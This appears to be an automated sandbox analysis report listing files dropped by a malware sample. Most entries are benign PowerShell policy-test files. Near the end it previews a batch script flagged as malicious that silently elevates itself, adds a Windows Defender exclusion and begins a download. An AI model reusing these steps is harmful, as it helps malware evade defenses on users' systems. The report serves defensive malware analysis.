                                                                                            Preview:t/4.c.F..U$`3...9Q*w...<..g.{..&...*..r:..V.o....n$..GT...#.[u.$@..j.....2p|.R...U...YPB.|.._.M.^o.3..9...J...J<.a.....U......t...;O...n8;.j..2...I.......^....=)....\.~..0nQ...0NM.s.[....j..........P.Q..G.m.j3[..b5i...O"....E..W..>.:O....F. .eO@...:E.m.........h#_..P...y.a._..w..8.~0-..XZ}...-.{4T.`F.y}9.....G...{..;.K.zX.{F.....`.O...&g........o4...D.].Xz.......\.;_....D..4...'._...B..".r{.m...^..l.h....^..b...T.L%+..3...e!.~....T..z.K`R..S...E.5,I.......*.9,..._..@.7...u..pY6.+G.P9.=..!...2.).5..?..T...)Y..\...z.s4-7.S.r9.(...0...>....m3.+.qP)RuI....E.{.i.....B...@....@...P.....p.[.:f.K:.t..Ko/....~.p...#!....Y.n..A.k..C.s .l.eR_:#...JW.Q..4...8.=..:..q..E..2.]......?..'V%...\...;M..w...6ID7.z.HN.6.B.#.Z..O..+.<q}.Kli.9.yXC.?..TB..;2..P.\....E.\i.._Q.t'.q.h2..U..aDl...O{Mp-N.7.{.9D.ze..ZH^F9I:..B..E......>..`...#vC:0.. v.p..,...z......[....Dm..;e)KH1=.;...V.].=...!..(S.............FiC....Y.}-q1.(...Z.(.m,...3..)1...

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1g34p5et.4rc.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ben243j.1yn.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3eabu4hg.5iw.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3q0epf34.252.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51fqvsdc.wok.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar0nodj4.2wo.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwxd2imy.1dv.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3sxhs4t.4sh.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_elko2l1p.gnv.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkocpzti.iv0.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkvsuuub.llt.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jayo3ugz.qm0.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxoiw40z.4rs.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzoajbmg.ul0.ps1

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lt23sg42.uvg.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0b3f1db.zik.ps1

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qslmitiz.oxh.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0pdmx2d.svf.psm1

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_soecxgge.ter.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_srxispal.yca.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_teca2rho.1tl.psm1

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ti3vknzb.kse.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmus2h0s.oy3.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w3epttx4.ydw.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\checkmiexe.bat

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1336
                                                                                            Entropy (8bit):4.9681332666961975
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:qAldUD4P/dAUZaV7RWkl8I96kSZaqhyIHSs5ukEs+sD3H:qAldUDk/dAUcV7RWklKFZhas5JEs+sD3
                                                                                            MD5:D1FDFAD5CE7134B1EF5A54CF37001031
                                                                                            SHA1:82E0F4E953B3AEACA622EC071639BAF6AE17AADB
                                                                                            SHA-256:54F8474D983DC3DD78E3D3289076152651E2F8CC5F30AE3F2740BA15E71CC6A6
                                                                                            SHA-512:B6B7B4F134A6B436CD32E39FB645D91ACC12482D352158A755359D0F6CBB8FD5BAB9351081916B0B638E3FF2BDE4B6AC2F6202F3CA58F1146F39DEFC039E88E7
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\checkmiexe.bat, Author: Joe Security
                                                                                            Preview:@echo off....:: Check if running as administrator..net session >nul 2>&1..if %errorlevel% neq 0 (.. powershell -WindowStyle Hidden -Command "Start-Process -FilePath '%~f0' -Verb runAs -WindowStyle Hidden".. exit /b..)....setlocal..set asmPath=%LocalAppData%\asm....:: Check if asmPath exists..if exist "%asmPath%" (.. :: Check if mi.exe process is running.. tasklist /fi "imagename eq mi.exe" | find /i "mi.exe" >nul 2>&1.. if errorlevel 1 (.. echo ASM path exists but mi.exe is not running. Executing commands..... goto ExecuteCommands.. ) else (.. echo ASM path exists and mi.exe is running. Exiting script... exit /b.. )..) else (.. echo ASM path does not exist. Executing commands..... goto ExecuteCommands..)....:ExecuteCommands..:: Add exclusion path silently..powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%asmPath%'"....:: Create directory silently..if not exist "%asmPath%" mkdir "%asmPath%"....:: Download f

                                                                                            C:\Users\user\AppData\Local\Temp\download.bat

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):819
                                                                                            Entropy (8bit):5.09009848738353
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:q925lda981kUMn53FSR2Y/mFZM081k5uj4EKk081ky8JwU4081kUMnAOjJxa:qAldUD4P/QSs5ukEs+sD3S
                                                                                            MD5:F2A75175C8082CCD3E1713B00556A6E2
                                                                                            SHA1:2F5DC37978320BC1CA207C0C0AFF1240AAD6C7CF
                                                                                            SHA-256:019157C15709F7D6301CB0FB15F45C054230EA91F06FF817B426D7F6CCB14686
                                                                                            SHA-512:011AB44E81D61636D5B1637584FAF0701A5B2226289B6200CD89AD97927F52F1C659DF626AFC2B46EDD656960D67934FFF97F5E10FD6A7454027D430FEAFA7A9
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\download.bat, Author: Joe Security
